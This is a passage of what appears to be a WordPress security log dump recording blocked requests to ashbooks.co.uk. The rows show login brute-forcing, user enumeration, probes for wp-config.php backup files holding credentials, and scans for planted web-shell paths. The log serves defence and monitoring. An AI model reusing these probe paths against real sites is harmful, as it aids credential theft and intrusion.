Safari\\/537.36\"}','m7SEhlKQJ094d2yUfFaHuOCk',0,1636103058.1283,433,'','GET',403,0,520,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','1xvzflua5m0OwdTnHD7JPtyF',0,1636105372.1224,441,'','GET',403,0,700,0,1,'',0),('196.206.165.155',3301877147,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','63MrzBm7TLEYfwpPxyctDWC9',0,1636114706.4199,453,'','GET',403,0,520,0,1,'',0),('196.206.165.155',3301877147,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','K4NbCu6j0zYB57JWv1RpiQcF',0,1636114713.2327,451,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/36.0.1985.125 Chrome\\/36.0.1985.125 Safari\\/537.36\"}','cy8nWgOJaoD4fqlRFY1Cbhtj',0,1636119266.7517,424,'','POST',403,0,600,0,1,'',0),('196.206.165.155',3301877147,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','7I3alrVUy6RMLDAGwfogZWui',0,1636121130.8640,597,'','GET',403,0,520,0,1,'',0),('196.206.165.155',3301877147,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','DmfdTSZH6kJEFpCjiYbRLX0n',0,1636121139.4540,440,'','POST',403,0,600,0,1,'',0),('123.58.210.246',2067452662,'','https://www.ashbooks.co.uk/api/web/user/getIndexData.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/94.0.4606.81 Safari\\/537.36 Edg\\/94.0.992.47\"}','ueynj0frV2ES9csUGNPlaXiJ',0,1636122643.2009,427,'','GET',403,0,700,0,1,'',0),('123.58.210.246',2067452662,'','https://www.ashbooks.co.uk/douyinpay.php?order=20210815173223834','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/94.0.4606.81 Safari\\/537.36 Edg\\/94.0.992.47\"}','9NkluXCVUbSzyAT31rZaBh6q',0,1636122693.4382,403,'','GET',403,0,700,0,1,'',0),('20.39.54.252',338114300,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','Q4bGW0clZDsxEhq9jp1P6VvT',0,1636122768.6013,1342,'','GET',403,0,520,0,1,'',0),('82.165.185.225',1386592737,'','https://ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','4EXj0DBpQwgmSxGsHLuhlvoJ',0,1636126111.8723,446,'','GET',403,0,700,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2772.79 Safari\\/537.36\"}','SYb7pmljRV2GOcyL0MCD4g1t',0,1636128864.1964,426,'','GET',403,0,700,0,1,'',0),('51.75.15.189',860557245,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','ebk6WPKFAhjM5TzLiw82YlUn',0,1636131588.2440,611,'','POST',403,0,600,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2640.1 Safari\\/537.36\"}','jOYcpKvhe0yAuVaLGNdID6sX',0,1636134961.3851,614,'','GET',403,0,700,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64; Trident\\/4.0)\"}','PduVSaWE7LwUni4cRMv8oZb6',0,1636137108.7842,15169,'','GET',403,0,700,0,1,'',0),('40.121.16.96',679022688,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','WY1aGfruELxP27tvDS8zX36l',0,1636138212.5204,2245,'','GET',403,0,520,0,1,'',0),('40.121.16.96',679022688,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','dOG8lFWt5VMuenNkpYU39KEz',0,1636138216.9041,1775,'','POST',403,0,600,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','u8crWgaNoR79ZhVFesYBpiMJ',0,1636141479.6554,144,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.backup','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','togBPl63y8JHWxVOUuaQrIqM',0,1636141479.9566,128,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.bak','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','38l1jPSnrqTyfOQIAm49eHpx',0,1636141480.2525,739,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.dist','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Fs8lSeUT4qa5KEQZ0r1DXmoz',0,1636141481.1635,513,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.html','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','lJ4z9MeOq3SECacorZ6PTRkn',0,1636141481.8507,166,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.inc','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','7I1xlLb2mNEhGRBWvVFenp0S',0,1636141482.1992,406,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.old','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','PhILjovzMWuTkmsOHq5RgcAJ',0,1636141482.7481,120,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.orig','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','qDMHBLeZhpcVTjxCuad75NkP',0,1636141483.0142,379,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.original','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','0nc8J195CkdhBwi3TpQAbFRo',0,1636141483.5583,123,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.save','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','JzD6dWUb9v8FoCOcginKY2ah',0,1636141483.8399,133,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.swp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','HsVehuD1oUTZwrCBARiWO52t',0,1636141484.1235,392,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.dump','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','8DU0BCQmWxLjOqNXcdPhTGgZ',0,1636141486.9615,192,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','P2BR8iAnGmhQapgojUCZlr4J',0,1636141487.9100,172,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.0','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Dy6kiSnJZcEjbOv2HgUXQd3W',0,1636141489.2173,388,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.tmp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','7s2geG8m96FKpCnTXoVxSydB',0,1636141491.8474,136,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.back','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','lX3T75psJZnQrNtkLiVayAfh',0,1636141492.7859,130,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.bac','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','RHaxC0emzd9VDqProlh8M6Ic',0,1636141493.6892,137,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.bk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','x8KCD3mBgYqQtb74E2SIedLN',0,1636141494.6216,127,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.bkp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','NZ0wMTdbftkXvm3IyqhuHOjK',0,1636141495.2385,412,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.b','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','xV8s1BNTAIjcWpZwgJGzYLPm',0,1636141496.1176,385,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','f8JyoOXiBIdYSr21kcUgR0D5',0,1636141497.0219,395,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.dev','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','zLkinE9X5K8Uqgbl7JZ4e2Yw',0,1636141497.8927,135,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.temp','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','Xxat0TPvJ9E1VZznNdFSmyWY',0,1636141498.7900,133,'','GET',403,0,700,0,1,'',0),('5.188.62.19',96222739,'','https://ashbooks.co.uk/wp-config.php.new','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.124 Safari\\/537.36\"}','RFHgXKDsOnCeaTlMwN80E6PG',0,1636141500.6453,153,'','GET',403,0,700,0,1,'',0),('95.223.73.192',1608468928,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','NaYU628EZIQyuAO1LDsRwnmr',0,1636147220.7719,432,'','GET',403,0,700,0,1,'',0),('40.121.16.96',679022688,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','OVkRICwx79Sl2APWFvBLNpZz',0,1636155053.3431,1355,'','GET',403,0,520,0,1,'',0),('40.121.16.96',679022688,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','6niJItQEv8TpsfXLxcyuNMFl',0,1636155056.3997,1230,'','POST',403,0,600,0,1,'',0),('103.152.118.225',1738045153,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','XxWRofGcI5guT4a1tzOBV7SA',0,1636156291.8025,196,'','POST',403,0,600,0,1,'',0),('185.63.173.50',3107958066,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','YW0Khm7dk8p4S3Rf6nOLojvE',0,1636158753.0624,708,'','POST',403,0,600,0,1,'',0),('161.35.225.67',2703483203,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','Flhn8rdvPOVCj7tL5RIsw2WY',0,1636159519.0266,423,'','GET',403,0,520,0,1,'',0),('161.35.225.67',2703483203,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','0say614vhmBiNjxIDO3W9bRF',0,1636159520.1168,424,'','POST',403,0,600,0,1,'',0),('185.49.20.79',3107001423,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','YKyCsx1DQaA4ikWZlJ9cbGdo',0,1636161083.2465,640,'','POST',403,0,600,0,1,'',0),('69.30.240.30',1159655454,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit\\/537.51.1 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11B554a Safari\\/9537.53\"}','e2aOcwXrDQ0LsFbuWUG4Inxv',0,1636162419.6092,467,'','POST',403,0,600,0,1,'',0),('34.134.243.229',579269605,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','6eWTF1oXELnPDvsJIQCaSUGZ',0,1636163569.9782,424,'','POST',403,0,600,0,1,'',0),('185.2.4.44',3103917100,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','z6FyQOh8cmIsK24UM0VJLtdq',0,1636166550.6499,962,'','POST',403,0,600,0,1,'',0),('212.224.76.233',3571469545,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','ocw9OVEMfeuSgQ0GhDYvUB7l',0,1636175234.1586,417,'','GET',403,0,520,0,1,'',0),('82.165.222.205',1386602189,'','https://ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"bluehost.com\"}','bDCPjnfZk9gLHR2OEGuIFQoh',0,1636178952.9150,763,'','GET',403,0,700,0,1,'',0),('192.187.118.203',3233511115,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','HpxfdNLKRM6oiSh0I2V1leFG',0,1636179855.5461,831,'','POST',403,0,600,0,1,'',0),('85.31.101.215',1428121047,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','vQ4X9bZrfewdMuLV0qHYDEkT',0,1636190424.8766,495,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','RPbKCB5Ym0F3AMGtUf9ks7dX',0,1636191291.4758,508,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','T62sZvScEueIYAoyOWq4pfCb',0,1636195619.1498,652,'','POST',403,0,600,0,1,'',0),('89.207.146.189',1506775741,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','k8bhYXZIi9HOuCVGgDzteFd7',0,1636197560.7266,428,'','POST',403,0,600,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Alvkf7qPBuoY6a3rgyeVzTnI',0,1636197994.8461,148,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6Uh0BMvTw9J8zLuG1pd7WxAe',0,1636197996.4909,463,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','exFlC7bMgS6sRriqyjHZT3zk',0,1636197998.5050,431,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r9KIFmspRc0b7o35DU8wXTAg',0,1636198000.5298,140,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/mawar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8pH4v7C5tsVAoBIeKj3GXFqd',0,1636198002.0383,844,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/pop.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3ruol2CWFbSLsGqOfJgjh4Mm',0,1636198005.0739,389,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/ko.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Me2OAaxn40WlTNIXcziPrtQE',0,1636198007.1373,413,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk/gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','01wCicxNoehA8sJHylgPWKu3',0,1636198009.3528,752,'','GET',403,0,700,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','zh0XndYv38boIxf7j2GpHZFW',0,1636206987.1639,2643,'','GET',403,0,520,0,1,'',0),('104.45.152.159',1747818655,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','CdeG36MvBXTNPa2fuhq0ElkL',0,1636206993.1841,2759,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','zPv6MXlL07ynCJopAHDicWrN',0,1636209490.4103,585,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','oNpjJyLBiIcMY5QFZ0E3nrTq',0,1636209515.5129,570,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','PT0njVd74pr9vBZE1slqSHyM',0,1636209548.5164,816,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Uriwk6ImgP4Jt5Kj7oa8hsXR',0,1636209590.6718,454,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','GACfzJXLuxFOd7ETq5kR03ly',0,1636209637.6370,556,'','POST',403,0,600,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','3rHeD9UEJPY1wsfZCQWgijp7',0,1636209690.6707,415,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','UO5zvsH3dDWY7IPtSLTKbAmN',0,1636209744.6696,479,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','nsKx4WCTbXJtuwaNj1EFlRZo',0,1636209798.3375,395,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rWYHGOElodAB9jRQ0kTfbN3c',0,1636209850.6610,410,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','1W7loIE5kMmPJF6OfdjZvYX3',0,1636209905.4589,453,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','KGdqW7jJ64BUYTMC12nkHAwN',0,1636209963.7358,445,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','wNbf9S4eaJpVAIWlyxRonPQh',0,1636210020.4172,398,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','8UoyKOZj0ERuvQ7wcaTbFGmf',0,1636210075.9945,450,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','SPDJjrK6zyWFe19nbNLMcdUv',0,1636210131.2931,402,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','OiE0DIpn9JsovacgC6bQP4rY',0,1636210183.6577,727,'','POST',404,0,700,0,1,'',0),('3.16.255.251',51445755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','QXN94SV5THgWhL3j1qBts08E',0,1636210238.1447,441,'','POST',404,0,700,0,1,'',0)